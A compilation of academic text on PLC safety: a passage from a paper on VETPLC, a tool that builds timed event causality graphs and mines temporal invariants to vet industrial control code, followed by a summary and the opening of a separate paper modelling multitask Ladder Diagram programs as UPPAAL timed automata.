a) Special Consideration for PLC Scan Cycles: Prior work has paid special attention to the PLC's dedicated data types, such as Timers and Counters [54], and its preemptive thread scheduling model [43]. In addition, we believe that it is also crucial to take into account the PLC's scan cycles, which cause an implicit yet significant impact on the entry points and data flow of PLC code. Nevertheless, to the best of our knowledge, this has never been seriously explored in prior work.
Entry Point Discovery. PLC code is event-driven and thus all its event handlers are program entry points. In contrast to typical event-driven programs that use dedicated constructs to explicitly implement event handling mechanisms, event handlers in PLC code are implicitly defined using IF-Conditions. Because internal value changes in one scan cycle do not become effective until the next one begins, the IF-Conditions in PLC code can only be affected by external inputs received at the beginning of a cycle. Therefore, in effect, they act as event handlers to capture either new sensor readings or updates from the last cycle. Hence, an IF-Condition becomes the entry point of its IF-Clause code as well as the subroutines called by the IF-Clause. For IF-Clause code wrapped by nested IF-Conditions, we consider the inner-most one to be its entry point.
Dataflow Analysis. The fact that variables are of fixed value in every cycle also causes the data flow to change. As explained in Section II, the process of data flow analysis for PLC code is mainly to track data dependencies between scan cycles. Further, due to the existence of asynchronous event handlers, the analysis should compute data reachability from any define in one cycle to any use in the next.
b) Graph Construction Algorithm: Our algorithm for generating timed event causality graphs is illustrated in Algorithm 1. This algorithm expects to receive three inputs: PLC, REMOTE and IOMapping.
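Entry-point discovery of this kind can be sketched as a simple pattern match over ST source. The snippet below is a deliberately simplified illustration of ours (flat IFs only, a minimal assumed grammar); it is not the paper's analysis, which handles nested IF-Conditions and full ST parsing.

```python
# Sketch (assumed, simplified ST grammar) of entry-point discovery: in
# PLC code, IF-Conditions act as implicit event handlers, so each one is
# collected as the entry point of its IF-Clause.

import re

ST_SNIPPET = """
IF Pallet_Sensor AND NOT(Part_Sensor) THEN
  Pallet_Arrival := true;
END_IF;
IF Part_Sensor THEN
  Retract_Stopper := true;
END_IF;
"""

def entry_points(st_code):
    # One entry point per IF-Condition; \b keeps END_IF from matching.
    # Nested IF-Conditions are not handled in this sketch.
    return re.findall(r"\bIF\s+(.+?)\s+THEN\b", st_code)

for ep in entry_points(ST_SNIPPET):
    print(ep)
# Pallet_Sensor AND NOT(Part_Sensor)
# Part_Sensor
```

Each extracted condition is then treated as the handler that guards its IF-Clause and any subroutines the clause calls.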
They represent PLC code, a set of remote controller code (e.g., robot code) and the I/O mappings between the PLC and remote devices, respectively. Its output is a timed event causality graph, TECG, which is comprised of a set of edges. The I/O mappings are automatically established when remote devices are added to the PLC and thus can be retrieved from PLC configurations. During initialization, we set TECG to be an empty set. Next, we transform all predicates in the IF-Conditions of PLC code into disjunctive normal form (DNF) in order to illustrate them using an And-Or graph. Thus, an original predicate becomes a set of sub-predicates connected via OR logic, while each sub-predicate is a conjunction of events depicted as compounded edges. Further, we retrieve all the entry points (i.e., IF-Conditions) EP of the PLC code. Meanwhile, we also link neighbors of nested IF-Conditions to show their control relations. Then, we iterate over every event (i.e., atomic proposition) p_in in EP and seek its root causes, which are events or event combinations that can always lead to p_in. We first aim to discover the root causes for p_in within the PLC code. To this end, we perform use-def chain analysis to obtain the definition set DEF of p_in and then look for the entry point EP′ (again, IF-Conditions) of each definition def in DEF. The events in EP′ thus have causal impact on def and on p_in. To ensure the positive causal dependency between EP′ and p_in, we also conduct constant analysis for def. If def is a constant and its value can satisfy p_in, we can then determine that EP′ can cause p_in to happen. Hence, we call TECG.AddCompoundEdges() to link EP′ with p_in and handle the construction of compounded edges. It is worth noting that since IF-Conditions in one scan cycle can be affected by any code in the previous one (data flow-wise), our use-def chain and constant analyses will look for definitions from everywhere in the PLC code.
Ideally, we could consider an infinite chain of scan cycles and compute backward dataflow exhaustively in an iterative fashion. However, such computation is excessively expensive. Besides, the generated dependencies can be extremely complex (e.g., conditional dependencies) and therefore may not be easily applied to event sequence generation. Thus, in practice, we take a conservative approach and only look back one previous cycle. As a result, our analysis may miss some dependencies under specific conditions. Nevertheless, while missing a dependency may lead to invalid permutations of events, it does not result in the exclusion of valid event sequences. Moreover, our evaluation shows that, although conservative, our analysis can already help remove a large number of invalid sequences.

Besides searching for intra-PLC causalities, we also seek possible root causes of pin across devices. Our cross-device analysis starts at Ln.13. It is performed on an on-demand basis and only begins when pin is mapped to an output of a remote device. If pin indeed exists in the IOMapping, we retrieve its mapped counterpart rout and add an edge (rout, pin) into TECG. Then, we search for the entry point REP for rout in the code of the remote controller (e.g., robot, CNC, PLC). The entry point REP represents the trigger of rout. If any input rin in REP can be mapped to a PLC output
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply.
Algorithm 1 Construction of Timed Event Causality Graph
1:  procedure BUILDTECG(PLC, REMOTE, IOMapping)
2:      TECG ← ∅
3:      TRANSFORMPREDICATESTODNF(PLC)
4:      EP ← GETANDLINKENTRYPOINTS(PLC)
5:      for pin ∈ EP do
6:          DEF ← USEDEFCHAIN(PLC, pin)
7:          for def ∈ DEF do
8:              if ISCONST(def) ∧ ISSATISFIED(pin, def) then
9:                  EP ← GETENTRYPOINT(PLC, def)
10:                 TECG.ADDCOMPOUNDEDGES(EP, pin)
11:             end if
12:         end for
13:         if IOMapping.EXISTS(pin) then
14:             rout ← IOMapping.GET(pin)
15:             TECG ← TECG ∪ (rout, pin)
16:             REP ← GETENTRYPOINT(REMOTE, rout)
17:             for rin ∈ REP do
18:                 if IOMapping.EXISTS(rin) then
19:                     pout ← IOMapping.GET(rin)
20:                     TECG ← TECG ∪ (pout, rin)
21:                     EP ← GETENTRYPOINT(PLC, pout)
22:                     TECG.ADDCOMPOUNDEDGES(EP, pout)
23:                 end if
24:             end for
25:         end if
26:     end for
27:     ADDEVENTCLASSANDDURATION(TECG, PLC, REMOTE)
28:     return TECG
29: end procedure

pout, the edge (pout, rin) will be added to TECG as well. We then trace back from pout to find its entry point EP in the PLC code, and add compounded edges from EP to pout.

The last step of graph construction is to annotate vertices with event classes and durations. Event classes can be explicitly obtained from the variable declarations in PLC/CNC code or from robot specifications. The durations of all events are by default set to Permanent (P); only if we can infer the concrete time duration of an event do we safely update its label. To this end, for each input event (i.e., atomic proposition), we first discover the constant definitions that cause the proposition to be true. Then, we discover all the negative redefinitions that lead the proposition to be false. Next, we perform intra-procedural reachability analysis from those definitions to those redefinitions. If a reachable path is discovered, we further examine every statement along the path to see if any time-related instructions (i.e., wait) are present. If so, we extract and accumulate their constant parameters as the duration of this event. We do not handle variable parameters in this work.
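The duration-inference step just described can be sketched as follows. This is a simplified straight-line version; the statement encoding and the robot program are our assumptions, not the paper's implementation:

```python
# Sketch of event-duration inference: find a path from a constant definition
# that makes a proposition true to a redefinition that makes it false, and
# accumulate the constant parameters of `wait` instructions along it.

def infer_duration(stmts, var):
    """Return accumulated wait time between var:=1 and var:=0, else None.
    None stands for the default 'Permanent' (P) label."""
    total, active = 0, False
    for op, arg in stmts:
        if op == "set" and arg == (var, 1):
            active, total = True, 0          # positive definition reached
        elif active and op == "wait":
            if not isinstance(arg, int):     # variable parameters unhandled
                return None
            total += arg
        elif active and op == "set" and arg == (var, 0):
            return total                     # negative redefinition reached
    return None

robot = [("set", ("Deliver_Part", 1)), ("wait", 20), ("wait", 5),
         ("set", ("Deliver_Part", 0))]
print(infer_duration(robot, "Deliver_Part"))  # 25
```

If no negative redefinition is reachable, the event keeps its Permanent label, mirroring the default described above.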
The implementation is further explained in Appendix B.

V. DISCOVERY OF TEMPORAL CONTEXT

A. Data Collection

Collecting Data Instead of Events. Ideally, we would like to directly collect event traces from ICS testbeds to identify their temporal behavior. However, this requires instrumentation of various distributed data sources, including sensors, robot I/O modules, RFID, etc., and therefore is an extremely difficult and tedious task. On the contrary, the data trace of PLC variables is easier to obtain due to standardized communication protocols. Yet it only preserves the runtime states of these variables and does not record the events that cause the states to transition. To bridge this gap, we infer the presence of events based upon value changes in data traces, and thus manage to approximate the collection of discrete physical events with the retrieval of continuous data traces.

Interesting Properties. We are interested in three properties of PLC variables: name, value and timestamp. The variable name serves as the unique identifier of a variable; the instant value of a variable reflects its current state and can be affected by specific events; the timestamp is the system time when the variable is being observed. Thus, we can define a data item d in our observation as a triple: d = (var_name, value, time).

Querying Realtime Data in Recurring Operations. We collect both positive and negative data traces from running testbeds. A positive instance begins with the arrival of an empty pallet and ends in the successful departure of a loaded pallet, and thus contains all the interesting stages such as robot delivery and RFID update. A negative instance does not reach the successful stage, for reasons such as an arriving pallet already loaded with a part, the robot not being ready, the CNC not being ready, etc. For every instance, we keep logging all the variable values over time in order to retrieve runtime data traces.
Formally, a data trace DT is a list of data items d: DT = {d0, d1, ..., dn}. In practice, we run the Cell-1 logic 20 times and collect 10 positive and 10 negative instances, each of which takes approximately 25 minutes. Thus, our dataset consists of a set of data traces and we refer to it as DT = {DT0, DT1, ..., DTm}, where m = 19. We obtained 1.2 GB of data in 10 hours from our testbed, which runs logic code containing 35 variables. It is noteworthy that, although limited, our dataset in practice can already help reveal the necessary invariants for detecting real-world safety problems. One possible solution to increase the amount and diversity of data traces is to follow a state-of-the-art technique (i.e., code mutation [33]) and automatically produce a large quantity of positive and negative data traces to cover a majority of normal and abnormal cases. We leave systematic trace construction as future work.

B. Mining Temporal Properties

Inferring Discrete Events from Data Traces. For each data trace DTi in our dataset DT, we first need to infer the existence of events. To this end, we divide every DTi into multiple sublists {DTi_v0, DTi_v1, ..., DTi_vk}, where the items in an individual sublist share the same variable name. We then iterate over each sublist. If we discover a difference between the values of two neighboring items d'l and d'l+1, we record a new event e = (type, time), where the type is denoted using the new state of this variable and the time is the timestamp of d'l+1. For instance, if the value of variable Deliver_Part rises from 0 to 1 at time 33, then we identify an event (Deliver_Part, 33); if Part_AtConveyor's value drops from 1 to 0 at time 60, then we find an event (Part_AtConveyor, 60). Eventually, we merge the discovered events from all sublists and thus convert a data trace DTi into an event trace ETi = {e0, e1, ..., ep}. We therefore obtain a dataset of event traces ET = {ET0, ET1, ..., ET19}. The formal algorithm is presented as Algorithm 3 in Appendix C.
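The inference step can be sketched directly from this description (the trace values below are illustrative; only the split-then-diff structure follows the paper):

```python
# Sketch of event inference: split a data trace per variable, then turn each
# value change into an event (type, time).
from collections import defaultdict

def infer_events(data_trace):
    """data_trace: list of (var_name, value, time) triples, time-ordered."""
    sublists = defaultdict(list)
    for var, value, time in data_trace:
        sublists[var].append((value, time))
    events = []
    for var, items in sublists.items():
        for (v0, _), (v1, t1) in zip(items, items[1:]):
            if v0 != v1:                       # value change => event
                events.append((f"{var}={v1}", t1))
    return sorted(events, key=lambda e: e[1])

trace = [("Deliver_Part", 0, 0), ("Part_AtConveyor", 1, 0),
         ("Deliver_Part", 1, 33), ("Part_AtConveyor", 0, 60)]
print(infer_events(trace))
# [('Deliver_Part=1', 33), ('Part_AtConveyor=0', 60)]
```

The event type here encodes the variable's new state, matching the Deliver_Part and Part_AtConveyor examples above.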
TABLE I: Mined Invariants
Event Pair | Invariant
□(Deliver_Part → ◇Part_AtConveyor) | [24.4s, 24.6s]
□(Update_Part_Process → ◇RFID_IOComplete) | [15s, 20s]
□(Update_Part_Process → ◇Update_Complete) | [15s, 20s]

Temporal Invariants for Events. Once we have generated event traces, we would like to uncover constant time intervals between events of different types. Such constants can reflect the operation time of specific machines. However, in reality, due to variation in program paths and the indeterminism of mechanical, physical or chemical processes, the durations of real-world machine operations are never constant. On the other hand, due to physical and logical limits, machine actions are bounded by time constraints. Hence, our goal is to identify soft invariants of event temporalities that fall into specific ranges. We formally define temporal invariants using Timed Propositional Temporal Logic (TPTL) [26]:

Definition 2. Let εa and εb be two event types. Then a temporal invariant is a property that relates εa and εb in both of the two following ways:

□tx.(εa → ◇ty.(εb ∧ ty − tx ≥ lower)): In an event trace, if an event instance of type εa occurs at time tx, then another of type εb will eventually happen in the same trace at a later time ty, while the time difference between ty and tx is at least lower.

□tx.(εa → ◇ty.(εb ∧ ty − tx ≤ upper)): In an event trace, if an event instance of type εa occurs at time tx, then another of type εb will eventually happen in the same trace at a later time ty, while the time difference between ty and tx is at most upper.

As a result, a temporal invariant describes not only the order of two event types but also the lower and upper bounds of their time difference.
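One way such a soft invariant can be mined from event traces is sketched below. This is a simplified illustration of the qualitative check (every εa followed by some εb) plus extraction of the [lower, upper] bounds; it is not the Synoptic/Perfume implementation, and the traces are toy data:

```python
# Sketch of mining a temporal invariant for one event-type pair over a set
# of event traces (lists of (type, time) pairs).

def mine_invariant(traces, a, b):
    follows = occurrence = 0
    deltas = []
    for trace in traces:
        for i, (ta, t0) in enumerate(trace):
            if ta != a:
                continue
            occurrence += 1
            later = [t1 for tb, t1 in trace[i + 1:] if tb == b]
            if later:
                follows += 1
                deltas.append(later[0] - t0)   # first matching b event
    if follows != occurrence or not deltas:    # qualitative property fails
        return None
    return (min(deltas), max(deltas))          # soft invariant [lower, upper]

traces = [[("Deliver_Part", 0), ("Part_AtConveyor", 24.4)],
          [("Deliver_Part", 0), ("Part_AtConveyor", 24.6)]]
print(mine_invariant(traces, "Deliver_Part", "Part_AtConveyor"))  # (24.4, 24.6)
```

With these two toy traces the mined range matches the first row of Table I, while the reversed pair yields no invariant.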
To extract these invariants, we follow the approach of prior work (Synoptic [29] and Perfume [60]) and perform qualitative and quantitative data mining consecutively. However, unlike previous techniques that attempt to mine all possible correlations between any two events, our mining is selective and is guided by the generated TECG. Specifically, we do not need to learn a temporal relationship for a pair of event types if it contradicts the dependencies in the graph. For example, in our motivating case, since we know the temporal logic □(RFID_IOComplete → ◇Update_Complete) holds, we do not further seek the possibility of whether Update_Complete is followed by RFID_IOComplete.

For all pairwise relationships of two event types, εa and εb, that do not contradict those in the TECG, we first check whether their qualitative temporality □(εa → ◇εb) holds. This is equivalent to checking whether

Follows[εa][εb] = Occurrence[εa]   (1)

where Follows[εa][εb] counts, in a trace, the number of type-εa events followed by at least one type-εb event, and Occurrence[εa] counts the number of event instances of εa. Once we have determined the followed-by relationship between two event types, we use the Perfume [60] algorithm to perform quantitative mining and extract the lower and upper bounds of the time differences. In the end, we discovered 3 invariants for the motivational case, as listed in Table I.

Speed Reconfiguration of Real-world Machines. The mined bounds of soft invariants, lower and upper, reflect the variation in program executions and production processes. However, such bounds are still associated with the pre-configured speeds of physical machines, which oftentimes do not reach the specified hard limits. To further understand the possible impact caused by speed reconfiguration, we need to consider absolute time bounds for these machine operations.
Let job be the number of machine operations and vconf be the pre-configured speed; then lower ≤ job/vconf ≤ upper. To derive the absolute lower bound for the time cost tjob, we consider the rated motor speed vrated and thus have: (lower × vconf)/vrated ≤ job/vrated ≤ tjob. Meanwhile, since the minimum machine speed can theoretically be 0, the absolute maximum time to complete a task is infinity. However, in reality, for high throughput, machines are expected to finish jobs as quickly as possible. Thus, ideally, machines always operate at their highest speeds. Nevertheless, safety standards have been established to regulate the maximum machine speed. For instance, the American National Standards Institute (ANSI) has published ANSI RIA R15.06 [22] for Robot and Robot System Safety, which recommends that robot speed should not exceed 10 in/sec (250 mm/sec) for safety-critical operations. Such recommendations can be considered the lowest machine speeds that guarantee efficient and safe production. With this required safety speed, vsafe, we can further obtain the practical upper bound of tjob:

(lower × vconf)/vrated ≤ tjob ≤ (upper × vconf)/vsafe   (2)

Admittedly, to incorporate hardware limits, we need to understand the semantics of the mined invariants in order to associate this additional information with the correct edges. We currently address this problem using human knowledge and leave the automatic inference of event semantics as future work. With domain knowledge, we know the time for our robot to pass a part equals the time difference between Deliver_Part and Part_AtConveyor. Further, our robot runs at 400 mm/sec on average and its rated speed is 3300 mm/sec. Thus, we can obtain an enhanced invariant for this event pair: [3s, 39.4s].

Enhancing TECG with Temporal Invariants. The extracted temporal invariants are then provided to the TECG.
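Plugging the quoted figures into equation (2) reproduces the enhanced invariant; a quick numeric check (variable names are ours):

```python
# Numeric check of equation (2): mined bounds [24.4s, 24.6s], configured robot
# speed 400 mm/sec, rated speed 3300 mm/sec, and the ANSI RIA R15.06 safety
# speed of 250 mm/sec.

lower, upper = 24.4, 24.6                  # mined soft invariant (seconds)
v_conf, v_rated, v_safe = 400, 3300, 250   # mm/sec

t_min = lower * v_conf / v_rated   # fastest: job done at rated motor speed
t_max = upper * v_conf / v_safe    # slowest: job done at the safety speed

print(round(t_min, 1), round(t_max, 1))  # 3.0 39.4
```

The result matches the enhanced invariant [3s, 39.4s] stated above.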
Note that they not only offer quantitative information to enhance the existing temporal relations in the graph but may also introduce new temporal dependencies. This is because the code we analyze represents only a partial view of the entire ICS environment and therefore does not contain all the event relations. As a complement, mining runtime data traces offers a holistic view of the plant and can further uncover implicit dependencies hidden from controller code.

VI. SAFETY VETTING WITH TIMED EVENT SEQUENCES

A. Timed Event Sequences

Once we have constructed the TECG, we can generate event sequences based upon this graph. The major challenge is how to create event permutations that conform to the quantitative dependencies illustrated by the TECG. Generally speaking, to encode the mined time range of an event (i.e., a soft temporal invariant) into a sequence, we discretize the continuous range into multiple time slices and introduce a versioned event for each slice to represent its possible occurrences. To reflect the qualitative relations among events, we check every possible permutation against the graph, so as to guarantee that the prerequisite of each event happens before its occurrence.

Algorithm 2 Generation of Timed Event Sequences
1:  procedure BUILDTSEQS(TECGin, Δ)
2:      Set_event ← GETEVENTSET(TECGin)
3:      Set'_event ← DISCRETIZE(Set_event, Δ)
4:      SEQ ← PERMUTE(Set'_event)
5:      for seq ∈ SEQ do
6:          for ev ∈ seq do
7:              Path ← FINDALLSOLUTIONS(TECGin, ev)
8:              if ∄ path ∈ Path : path ⊆ seq.SUBSEQ(0, ev) then
9:                  SEQ ← SEQ ∖ {seq}
10:             end if
11:         end for
12:     end for
13:     return SEQ
14: end procedure

Our algorithm BUILDTSEQS is presented in Algorithm 2. It takes two arguments. The first one is TECGin, a reduced version of TECG, which preserves solely the nodes that are PLC inputs.
These input events are the necessary ones to exercise the PLC code. The second argument is the discretization parameter Δ, which indicates the number of slices every time duration is divided into. On startup, our algorithm first retrieves all the events in the graph TECGin to generate an event set Set_event. Next, for any event in Set_event whose starting time is within a certain range (i.e., its incoming edge is labeled with an invariant), the range is discretized using Δ to create multiple versioned events. We then replace the original event with the set of versioned ones. For instance, since Part_AtConveyor is enabled 3 to 39.4 seconds after Deliver_Part, it is discretized to the set {PAC_T+3, PAC_T+10, PAC_T+18, PAC_T+25, PAC_T+32, PAC_T+39} (writing PAC for Part_AtConveyor) when Δ is 5. Hence, we extend Set_event to a new set Set'_event. Then, we permute all the events in Set'_event to create sequences. Notice that in every permutation, only one versioned event from the same set can be chosen. The result of this PERMUTE is a set SEQ containing all candidate sequences. We further check each candidate seq to see if it contradicts the causalities indicated by TECGin, and if so, it is discarded. To do so, we iterate over each event ev in a sequence seq, and find all the solutions for ev on its hosting and-or graph TECGin. A solution for ev is a path, from ev to a top-level vertex, which includes all of the prerequisites that are required to cause ev to happen. If any solution path is covered by the subsequence from the first element of seq to ev, we keep the candidate seq. Otherwise, it is removed from SEQ. Finally, we output the result SEQ as the generated timed event sequences.
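The DISCRETIZE step can be sketched as follows; this is an illustrative re-implementation that reproduces the Part_AtConveyor example (PAC abbreviates Part_AtConveyor), not the authors' code:

```python
# Sketch of DISCRETIZE: split a mined time range into delta slices and emit
# one versioned event per slice boundary.

def discretize(event, lower, upper, delta):
    step = (upper - lower) / delta
    return [f"{event}_T+{round(lower + i * step)}" for i in range(delta + 1)]

print(discretize("PAC", 3, 39.4, 5))
# ['PAC_T+3', 'PAC_T+10', 'PAC_T+18', 'PAC_T+25', 'PAC_T+32', 'PAC_T+39']
```

With Δ = 5 this yields exactly the six versioned events quoted above; a permutation may then pick at most one of them.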
For our motivating example, we can create a timed sequence 1:Pallet_Sensor ⇝ 2:Part_Sensor ⇝ 3:CNC_Part_Ready ⇝ 4:Robot_Ready ⇝ 5:Part_AtConveyor ⇝ 6:Part_AtConveyor_T+10 ⇝ 7:RFID_IOComplete_T+20, which can lead to the safety violation due to the premature termination of 6:Part_AtConveyor_T+10. Detailed implementation can be found in Appendix D.

Selection of Δ. A naive way of discretizing a time range is to merely consider its lower and upper bounds (i.e., Δ = 1). Theoretically, this is sufficient to detect the possible presence of timing-related safety violations. However, it is too coarse-grained and can only tell whether an error will occur when a machine operates at its maximum or minimum speed. On the contrary, it is in fact crucial to understand the range of machine speeds that can lead to errors. Such contextual evidence can help security investigators draw a better conclusion on whether a logic error is caused by attacks. For example, prior work [38] has correlated the narrowness of an error trigger with its malice. Thus, ideally, we expect to always select a larger Δ. However, an increase in time slices also leads to growth in the total number of permutations. To understand how to strike a balance, we conduct an empirical study in the evaluation. Nevertheless, it is noteworthy that, while a better Δ can provide informative evidence with lower cost, the selection of Δ does not affect whether we can detect a safety defect.

B. Safety Specification

The event sequences that we generate can facilitate automated path exploration for testing PLC code. However, the fact that we can reach an unsafe state does not necessarily mean we can automatically detect the problem. To enable automated detection, we need to further specify certain safety rules and programmatically verify them at runtime. Prior work [54] has adopted linear temporal logic (LTL) to formally define safety requirements for ICSs.
However, at runtime, it is hard to enforce an LTL-based rule which requires an activity to be followed by another (e.g., overflow avoidance), because the absence of a required event during a limited test time does not imply its absence at a later time. Although, in practice, these required actions must be accomplished within a certain amount of time, LTL is not capable of describing such temporal relations in a quantitative fashion. To address this limitation, we again use TPTL [26] to quantitatively express safety specifications.

Definition 3. Let P be a set of atomic logical proposition symbols about the system {p1, p2, ..., p|P|}, e.g., sensor Pallet_Sensor is on, and let Σ = 2^P be a finite alphabet composed of these propositions. Then, the set of TPTL-based Safety Requirements is inductively defined by the grammar:

π := x + c | c
φ := p | π1 ≤ π2 | π1 ≡d π2 | false | φ1 → φ2 | ◯φ | φ1 U φ2 | x.φ

The grammar of TPTL is further explained in Appendix E. Table II demonstrates 5 typical classes of safety specifications, which have been studied by previous academic work or are required by OSHA (the Occupational Safety and Health Administration). We categorize the policies based on the root causes of industrial hazards. First, a majority of safety incidents are caused by dangerous machine-machine interactions, including machine collision and machines facing overflow or underflow due to upstream machines. Second, failure to separate humans from life-threatening machines may result in fatal accidents. Last but not least, individual machines, even without interac-

TABLE II: Categories of Safety Specifications
Typical Hazard | Example Specification to Avoid Hazard | Formal Definition
Summary:
Safety violations in programmable logic controllers (PLCs), caused either by faults or attacks, have recently garnered significant attention. However, prior efforts at PLC code vetting suffer from many drawbacks. Static analysis and verification cause significant false positives and cannot reveal specific runtime contexts. Dynamic analysis and symbolic execution, on the other hand, fail due to their inability to handle real-world PLC programs that are event-driven and timing sensitive. In this paper, we propose VETPLC, a temporal context-aware, program-analysis-based approach to produce timed event sequences that can be used for automatic safety vetting. To this end, we (a) perform static program analysis to create timed event causality graphs in order to understand causal relations among events in PLC code and (b) mine temporal invariants from data traces collected in Industrial Control System (ICS) testbeds to quantitatively gauge temporal dependencies that are constrained by machine operations. Our VETPLC prototype has been implemented in 15K lines of code. We evaluate it on 10 real-world scenarios from two different ICS settings. Our experiments show that VETPLC outperforms state-of-the-art techniques and can generate event sequences that can be used to automatically detect hidden safety violations.
|
Summarize:
Keywords: Programmable Logic Controllers, Timed Automata, Model Checking.

1 Introduction

Verification of safety properties for PLC (Programmable Logic Controller) programs is important when these programs are to control critical applications for reactive systems. This explains the increasing interest in the past few years in the application of formal methods to the analysis of such programs. In this area, work was mostly devoted to the untimed framework [15], [4,8], even when function blocks for timers were included [16]. Introducing the study of quantitative properties related to time makes this verification step harder, because additional components must be added to the model, for instance clocks, which increase the size of the model. However, the model of timed automata, introduced in 1990 by Alur and Dill [2,3], has proved very successful. Some decidability results were obtained for this model as well as for some extensions, and they were implemented in efficient tools called timed model-checkers, like HYTECH [9], KRONOS [6] or UPPAAL [11], which have been applied to industrial case studies. Timed automata have recently been used for the modeling of timed features in PLC programming [13,12,7]. In this work, we are interested in the combination of time aspects with multitask PLC programming.

*This work was supported by the PluriFormation Project VSMT of ENS Cachan.
Our case study concerns a part (called station 2) of the MSS (Mecatronic Standard System) platform from Bosch Group, in which multitask programming can be used to reduce the reaction time of the control program to an external signal. The program is written in Ladder Diagram, one of the languages most commonly used in this area, which is part of the IEC 61131-3 standard [10]. We give semantics for a subclass of Ladder Diagram programs including timer function blocks, in terms of timed automata, and we also provide a timed-automata-based model for the operative part of the system. These timed automata are described in UPPAAL syntax. While a similar approach was introduced in [12], we propose here additional restrictions which allow us to reduce significantly the size of the complete model, obtained from its components by a synchronized product: these restrictions consist in atomicity hypotheses, compacting sequences of actions from the control program into a single one, and lead to reasonable verification times for the response property to be checked. We also give a simpler model for timers, using particular features of UPPAAL.

0-7803-9402-X/05/$20.00 © 2005 IEEE

Section 2 of the paper explains the context of this study: the problem of reaction times in PLC programs, and includes a description of timed automata and a short presentation of UPPAAL. In Section 3, we give more details on the Bosch MSS platform and in Section 4, we give the semantics of the control program. Section 5 presents the timed automata which form the components of the network, while Section 6 gives the results of the verification step.

2 Programmable Logic Controllers and Timed Automata

2.1 Programmable Logic Controllers with multi-task programming

Programmable Logic Controllers (PLCs) execute programs for the control of an operative part, to which they are connected via an input/output system. The control programs can be written in several languages described in the IEC 61131-3 [10] standard. The execution of such a program consists in iterating a cycle with three main steps (figure 1): first, input variables are read and their values are stored in memory. Then a computation step is performed using these values, producing output values which are also stored. The last step is an activation using the output values. The cycle duration P is called the PLC scan.

Figure 1. The cyclic execution of a PLC program (input scan, program execution, output activation; P: PLC scan)

The programming design may be either monotask or multitask. In the first case, a single program executes sequentially, while in the second case, the main task can be interrupted by additional parts of code, either with a fixed period or triggered by some events. These two execution models result in different reaction times to changes of values. In the monotask case, if the change of value occurs at the input scan, the corresponding output is emitted at the end of the PLC cycle. If the change occurs later, this output may be emitted as late as the end of the next cycle. This results in a reaction time in the interval [P, 2P] (figure 2). This reaction time can be reduced with multi-task programming: consider an event-driven task interrupting the main task when some event occurs. In turn, the interrupting task reads its input and computes its new output values. Depending on the configuration and type of the PLC, these values can be emitted either at the end of the event-driven task or at the end of the current main task. In this work, we investigate the second case where output values of the event-driven task are emitted by the main program, which yields a reaction time of at most P.

Figure 2. Reaction time with mono-task programming

2.2 Timed automata

The timed automaton model was introduced by Alur and Dill [2], [3]. It consists of a finite automaton which handles a finite set of variables called clocks. The clocks are used for the specification of quantitative time constraints which may be associated with transitions. These variables evolve synchronously with time (slope 1).
For a set X of clocks, P(X) denotes the powerset of X and we define C(X) as the set of conjunctions of atomic formulas of the form x ⋈ c, for a clock x, a constant c and ⋈ ∈ {<, ≤, =, ≥, >}.

A timed automaton is a tuple A = (Σ, X, Q, q0, I, E), where Σ is a finite set of actions, X is the finite set of clocks, Q is a finite set of locations, with q0 ∈ Q the initial location, I is a mapping associating with each location q a clock constraint I(q) ∈ C(X), and E ⊆ Q × C(X) × Σ × P(X) × Q is the set of transitions.

The clock condition I(q) is called an invariant for location q, and usually contains only atomic formulas of the form x < c or x ≤ c, which must hold as long as time elapses in this location.

A transition of the automaton, written q --g,a,r--> q' ∈ E, is equipped with a label containing three parts (each one is optional): a guard g expressing a condition in C(X) on clock values, which must be satisfied for the transition to be fired, an action name in Σ, and a clock reset r ∈ P(X).

The semantics of a timed automaton is given in terms of transition systems. A configuration of the system is a pair (q, v), where q is a location of the automaton and v is a valuation of the variables, i.e. a mapping associating a real value with each clock. The initial configuration is (q0, v0), where all clock values are equal to 0 in v0. The system may change its configuration in two ways.

* Either by a delay move of d time units, written (q, v) --d--> (q, v + d), possible if v + d satisfies the invariant I(q) of location q.

* Or by an action move, written (q, v) --a--> (q', v'), associated with a discrete transition q --g,a,r--> q', if v satisfies the constraint g. In this case, the reset operation yields v'(x) = 0 if x belongs to r and v'(x) = v(x) otherwise, and v' must satisfy the invariant of q'.

2.3 The tool UPPAAL

The tool UPPAAL (see [5] for the more recent developments) offers a compact description language, a simulation module and a model-checker.
A system is represented by a collection of timed automata, which communicate through binary synchronization: a channel c can be defined for two automata. Sending a message is denoted by the discrete action c! while receiving the message is denoted by c?. An UPPAAL automaton also handles integer variables. A guard is a conjunction of atomic clock conditions and similar conditions on integer variables. Moreover, a clock reset may be augmented by an update of the integer variables.

A (global) configuration is of the form (ℓ, v), where ℓ is a location vector (indicating the current state in each component of the timed automata network) and v is a valuation of both clocks and discrete variables. An execution in the network starts in the initial locations of the different components with all the clocks and variables set to zero. The semantics of this model is expressed by moves between the configurations. Three types of moves can occur in the system: delay moves, internal moves and synchronized moves. Delay moves and internal moves have already been described above for a single automaton, so we simply describe now the global evolution.

Delaying. Given a current location vector, time elapses for all automata synchronously, as long as no invariant is violated. All clock values increase by the amount of time elapsed. No change occurs for the locations or the integer variables.

Performing an internal action. An internal action is an action which corresponds to neither c! (sending a message) nor c? (receiving a message). If such an action is enabled (the variable values satisfy the guard condition), the component can perform this action alone, while the others do nothing. Only the location of this component is changed, as well as its variables, according to the transition.

Synchronizing. If, in the network, some complementary actions c! and c? are enabled in two components (in particular, guards must be satisfied by the current valuation), then these components must synchronize. The location vector is changed for both components and the clock and variable values are changed according to the clock resets and updates of variables for the two transitions.

Finally, we introduce two additional features of UPPAAL which will be very useful in our modeling.
* A committed location (decorated by the special label C) corresponds to a location in which no delay move is possible. Only a discrete transition can be used to leave such a location. Note that this mechanism reduces the non-determinism in the parallel composition of the different components.

* A broadcast channel is a channel where more than two automata may communicate: the emission of a message c! can be synchronized with several receptions c? in other components. Note that this is a non-blocking synchronization, since the sender is never blocked, although the receiver must synchronize if it can. Guards on clocks are not allowed on the receiving edge.

3 Description of the MSS (Mecatronic Standard System) platform

Figure 3. Presentation of station 2 of the MSS platform (jack movement; optical, inductive and capacitive sensors; left/right position sensors; bearing test position)

